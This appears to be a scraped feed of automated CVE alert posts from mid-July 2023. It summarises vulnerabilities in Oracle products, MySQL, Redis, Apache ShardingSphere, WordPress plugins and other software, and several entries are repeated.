🚨 CVE-2023-3763A vulnerability was found in Intergard SGS 8.7.0. It has been declared as problematic. This vulnerability affects unknown code of the component SQL Query Handler. The manipulation leads to cleartext transmission of sensitive information. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234448. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 15:58:24 |
🚨 CVE-2023-28754Deserialization of Untrusted Data vulnerability in Apache ShardingSphere-Agent, which allows attackers to execute arbitrary code by constructing a special YAML configuration file.The attacker needs to have permission to modify the ShardingSphere Agent YAML configuration file on the target machine, and the target machine can access the URL with the arbitrary code JAR.An attacker can use SnakeYAML to deserialize java.net.URLClassLoader and make it load a JAR from a specified URL, and then deserialize javax.script.ScriptEngineManager to load code using that ClassLoader. When the ShardingSphere JVM process starts and uses the ShardingSphere-Agent, the arbitrary code specified by the attacker will be executed during the deserialization of the YAML configuration file by the Agent.This issue affects ShardingSphere-Agent: through 5.3.2. This vulnerability is fixed in Apache ShardingSphere 5.4.0.🎖@cveNotify |
|
| 2023-07-19 15:58:23 |
🚨 CVE-2023-3760A vulnerability has been found in Intergard SGS 8.7.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Change Password Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-234445 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 15:58:19 |
🚨 CVE-2021-38933IBM Sterling Connect:Direct for UNIX 1.5 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 210574.🎖@cveNotify |
|
| 2023-07-19 15:58:18 |
🚨 CVE-2023-3765Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.🎖@cveNotify |
|
| 2023-07-19 15:58:17 |
🚨 CVE-2023-27877IBM Planning Analytics Cartridge for Cloud Pak for Data 4.0 connects to a CouchDB server. An attacker can exploit an insecure password policy to the CouchDB server and collect sensitive information from the database. IBM X-Force ID: 247905.🎖@cveNotify |
|
| 2023-07-19 15:58:13 |
🚨 CVE-2023-29260IBM Sterling Connect:Express for UNIX 1.5 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 252135.🎖@cveNotify |
|
| 2023-07-19 15:58:12 |
🚨 CVE-2023-3753A vulnerability classified as problematic has been found in Creativeitem Mastery LMS 1.2. This affects an unknown part of the file /browse. The manipulation of the argument search/featured/recommended/skill leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-234423. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 15:58:11 |
🚨 CVE-2022-43910IBM Security Guardium 11.3 could allow a local user to escalate their privileges due to improper permission controls. IBM X-Force ID: 240908.🎖@cveNotify |
|
| 2023-07-19 12:58:23 |
🚨 CVE-2020-36750The EWWW Image Optimizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.8.1. This is due to missing or incorrect nonce validation on the ewww_ngg_bulk_init() function. This makes it possible for unauthenticated attackers to perform bulk image optimization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-19 10:58:30 |
🚨 CVE-2023-28754Deserialization of Untrusted Data vulnerability in Apache ShardingSphere-Agent, which allows attackers to execute arbitrary code by constructing a special YAML configuration file.The attacker needs to have permission to modify the ShardingSphere Agent YAML configuration file on the target machine, and the target machine can access the URL with the arbitrary code JAR.An attacker can use SnakeYAML to deserialize java.net.URLClassLoader and make it load a JAR from a specified URL, and then deserialize javax.script.ScriptEngineManager to load code using that ClassLoader. When the ShardingSphere JVM process starts and uses the ShardingSphere-Agent, the arbitrary code specified by the attacker will be executed during the deserialization of the YAML configuration file by the Agent.This issue affects ShardingSphere-Agent: through 5.3.2. This vulnerability is fixed in Apache ShardingSphere 5.4.0.🎖@cveNotify |
|
| 2023-07-19 10:58:28 |
🚨 CVE-2023-3076The MStore API WordPress plugin before 3.9.9 does not prevent visitors from creating user accounts with the role of their choice via their wholesale REST API endpoint. This is only exploitable if the site owner paid to access the plugin's pro features.🎖@cveNotify |
|
| 2023-07-19 10:58:27 |
🚨 CVE-2023-35887Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache MINA.In SFTP servers implemented using Apache MINA SSHD that use a RootedFileSystem, logged users may be able to discover "exists/does not exist" information about items outside the rooted tree via paths including parent navigation ("..") beyond the root, or involving symlinks.This issue affects Apache MINA: from 1.0 before 2.10. Users are recommended to upgrade to 2.10🎖@cveNotify |
|
| 2023-07-19 10:58:26 |
🚨 CVE-2022-3923The ActiveCampaign for WooCommerce WordPress plugin before 1.9.8 does not have authorisation check when cleaning up its error logs via an AJAX action, which could allow any authenticated users, such as subscriber to call it and remove error logs.🎖@cveNotify |
|
| 2023-07-19 10:58:25 |
🚨 CVE-2022-4057The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.🎖@cveNotify |
|
| 2023-07-19 10:58:24 |
🚨 CVE-2023-3762A vulnerability was found in Intergard SGS 8.7.0. It has been classified as problematic. This affects an unknown part. The manipulation leads to cleartext storage of sensitive information in memory. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-234447. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 10:58:23 |
🚨 CVE-2023-3763A vulnerability was found in Intergard SGS 8.7.0. It has been declared as problematic. This vulnerability affects unknown code of the component SQL Query Handler. The manipulation leads to cleartext transmission of sensitive information. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234448. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 10:58:22 |
🚨 CVE-2023-32635XBRL data create application version 7.0 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XBRL file, arbitrary files on the system may be read by an attacker.🎖@cveNotify |
|
| 2023-07-19 10:58:20 |
🚨 CVE-2023-3761A vulnerability was found in Intergard SGS 8.7.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Password Change Handler. The manipulation leads to cleartext transmission of sensitive information. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-234446 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 10:58:19 |
🚨 CVE-2023-3760A vulnerability has been found in Intergard SGS 8.7.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Change Password Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-234445 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 10:58:18 |
🚨 CVE-2022-24834Redis is an in-memory database that persists on disk. A specially crafted Lua script executing in Redis can trigger a heap overflow in the cjson library, and result with heap corruption and potentially remote code execution. The problem exists in all versions of Redis with Lua scripting support, starting from 2.6, and affects only authenticated and authorized users. The problem is fixed in versions 7.0.12, 6.2.13, and 6.0.20.🎖@cveNotify |
|
| 2023-07-19 10:58:17 |
🚨 CVE-2023-36824Redis is an in-memory database that persists on disk. In Redit 7.0 prior to 7.0.12, extracting key names from a command and a list of arguments may, in some cases, trigger a heap overflow and result in reading random heap memory, heap corruption and potentially remote code execution. Several scenarios that may lead to authenticated users executing a specially crafted `COMMAND GETKEYS` or `COMMAND GETKEYSANDFLAGS`and authenticated users who were set with ACL rules that match key names, executing a specially crafted command that refers to a variadic list of key names. The vulnerability is patched in Redis 7.0.12.🎖@cveNotify |
|
| 2023-07-19 10:58:16 |
🚨 CVE-2023-30589The llhttp parser in the http module in Node v20.2.0 does not strictly use the CRLF sequence to delimit HTTP requests. This can lead to HTTP Request Smuggling (HRS).The CR character (without LF) is sufficient to delimit HTTP header fields in the llhttp parser. According to RFC7230 section 3, only the CRLF sequence should delimit each header-field. This impacts all Node.js active versions: v16, v18, and, v20🎖@cveNotify |
|
| 2023-07-19 10:58:15 |
🚨 CVE-2023-0003A file disclosure vulnerability in the Palo Alto Networks Cortex XSOAR server software enables an authenticated user with access to the web interface to read local files from the server.🎖@cveNotify |
|
| 2023-07-19 10:58:14 |
🚨 CVE-2023-3759A vulnerability, which was classified as critical, was found in Intergard SGS 8.7.0. Affected is an unknown function. The manipulation leads to permission issues. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234444. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 10:58:13 |
🚨 CVE-2023-3757A vulnerability classified as problematic has been found in GZ Script Car Rental Script 1.8. Affected is an unknown function of the file /EventBookingCalendar/load.php?controller=GzFront/action=checkout/cid=1/layout=calendar/show_header=T/local=3. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-234432. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-19 00:58:39 |
🚨 CVE-2023-33898In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 00:58:37 |
🚨 CVE-2023-33897In libimpl-ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 00:58:36 |
🚨 CVE-2023-33896In libimpl-ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 00:58:35 |
🚨 CVE-2023-33902In bluetooth service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 00:58:34 |
🚨 CVE-2023-33895In fastDial service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-07-19 00:58:32 |
🚨 CVE-2023-3527A CSV injection vulnerability was found in the Avaya Call Management System (CMS) Supervisor web application which allows a user with administrative privileges to input crafted data which, when exported to a CSV file, may attempt arbitrary command execution on the system used to open the file by a spreadsheet software such as Microsoft Excel. 🎖@cveNotify |
|
| 2023-07-19 00:58:31 |
🚨 CVE-2023-22017Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.46 and Prior to 7.0.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. Note: This vulnerability applies to Windows VMs only. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-19 00:58:30 |
🚨 CVE-2023-22007Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.41 and prior and 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-19 00:58:28 |
🚨 CVE-2023-22020Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-07-19 00:58:27 |
🚨 CVE-2023-37141ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function Js::ProfilingHelpers::ProfiledNewScArray().🎖@cveNotify |
|
| 2023-07-19 00:58:23 |
🚨 CVE-2023-22052Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19.3-19.19 and 21.3-21.10. Difficult to exploit vulnerability allows low privileged attacker having Create Session, Create Procedure privilege with network access via multiple protocols to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java VM accessible data. CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-19 00:58:22 |
🚨 CVE-2023-21983Vulnerability in the Application Express Administration product of Oracle Application Express (component: None). Supported versions that are affected are Application Express Administration: 18.2-22.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Application Express Administration. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Application Express Administration accessible data as well as unauthorized read access to a subset of Application Express Administration accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Application Express Administration. CVSS 3.1 Base Score 5.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L).🎖@cveNotify |
|
| 2023-07-19 00:58:21 |
🚨 CVE-2023-22055Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are Prior to 9.2.7.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-07-19 00:58:20 |
🚨 CVE-2023-22004Vulnerability in the Oracle Applications Technology product of Oracle E-Business Suite (component: Reports Configuration). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Technology. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Technology accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-19 00:58:19 |
🚨 CVE-2023-22056Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-19 00:58:17 |
🚨 CVE-2023-22058Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.33 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-19 00:58:16 |
🚨 CVE-2023-22009Vulnerability in the Oracle Self-Service Human Resources product of Oracle E-Business Suite (component: Workforce Management). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Self-Service Human Resources. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Self-Service Human Resources accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-07-19 00:58:15 |
🚨 CVE-2023-37143ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function BackwardPass::IsEmptyLoopAfterMemOp().🎖@cveNotify |
|
| 2023-07-19 00:58:14 |
🚨 CVE-2023-22060Vulnerability in the Oracle Hyperion Workspace product of Oracle Hyperion (component: UI and Visualization). The supported version that is affected is 11.2.13.0.000. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hyperion Workspace. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Hyperion Workspace accessible data as well as unauthorized access to critical data or complete access to all Oracle Hyperion Workspace accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hyperion Workspace. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L).🎖@cveNotify |
|
| 2023-07-18 22:58:39 |
🚨 CVE-2023-22055Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are Prior to 9.2.7.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-07-18 22:58:37 |
🚨 CVE-2023-22004Vulnerability in the Oracle Applications Technology product of Oracle E-Business Suite (component: Reports Configuration). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Technology. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Technology accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-18 22:58:36 |
🚨 CVE-2023-22056Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-18 22:58:35 |
🚨 CVE-2023-22058Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.33 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-18 22:58:33 |
🚨 CVE-2023-22009Vulnerability in the Oracle Self-Service Human Resources product of Oracle E-Business Suite (component: Workforce Management). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Self-Service Human Resources. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Self-Service Human Resources accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-07-18 22:58:32 |
🚨 CVE-2023-22060Vulnerability in the Oracle Hyperion Workspace product of Oracle Hyperion (component: UI and Visualization). The supported version that is affected is 11.2.13.0.000. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hyperion Workspace. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Hyperion Workspace accessible data as well as unauthorized access to critical data or complete access to all Oracle Hyperion Workspace accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hyperion Workspace. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L).🎖@cveNotify |
|
| 2023-07-18 22:58:31 |
🚨 CVE-2023-21975Vulnerability in the Application Express Customers Plugin product of Oracle Application Express (component: User Account). Supported versions that are affected are Application Express Customers Plugin: 18.2-22.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Application Express Customers Plugin. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Application Express Customers Plugin, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Application Express Customers Plugin. CVSS 3.1 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-07-18 22:58:29 |
🚨 CVE-2023-21950Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.27 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-18 22:58:28 |
🚨 CVE-2023-21950Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.27 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-18 22:58:27 |
🚨 CVE-2023-22005Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.33 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-07-18 22:58:26 |
🚨 CVE-2023-22035Vulnerability in the Oracle Scripting product of Oracle E-Business Suite (component: iSurvey Module). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Scripting. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Scripting, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Scripting accessible data as well as unauthorized read access to a subset of Oracle Scripting accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-07-18 22:58:24 |
🚨 CVE-2023-21994Vulnerability in the Oracle Mobile Security Suite product of Oracle Fusion Middleware (component: Android Mobile Authenticator App). Supported versions that are affected are Prior to 11.1.2.3.1. Easily exploitable vulnerability allows unauthenticated attacker with access to the physical communication segment attached to the hardware where the Oracle Mobile Security Suite executes to compromise Oracle Mobile Security Suite. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Mobile Security Suite accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2023-07-18 22:58:23 |
🚨 CVE-2023-22061Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Visual Analyzer). The supported version that is affected is 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-07-18 22:58:21 |
🚨 CVE-2023-22010Vulnerability in Oracle Essbase (component: Security and Provisioning). The supported version that is affected is 21.4.3.0.0. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Essbase. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Essbase accessible data. CVSS 3.1 Base Score 2.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-07-18 22:58:20 |
🚨 CVE-2023-22006Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-18 22:58:19 |
🚨 CVE-2023-22011Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 5.4 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L).🎖@cveNotify |
|
| 2023-07-18 22:58:18 |
🚨 CVE-2023-22012Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). The supported version that is affected is 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-18 22:58:17 |
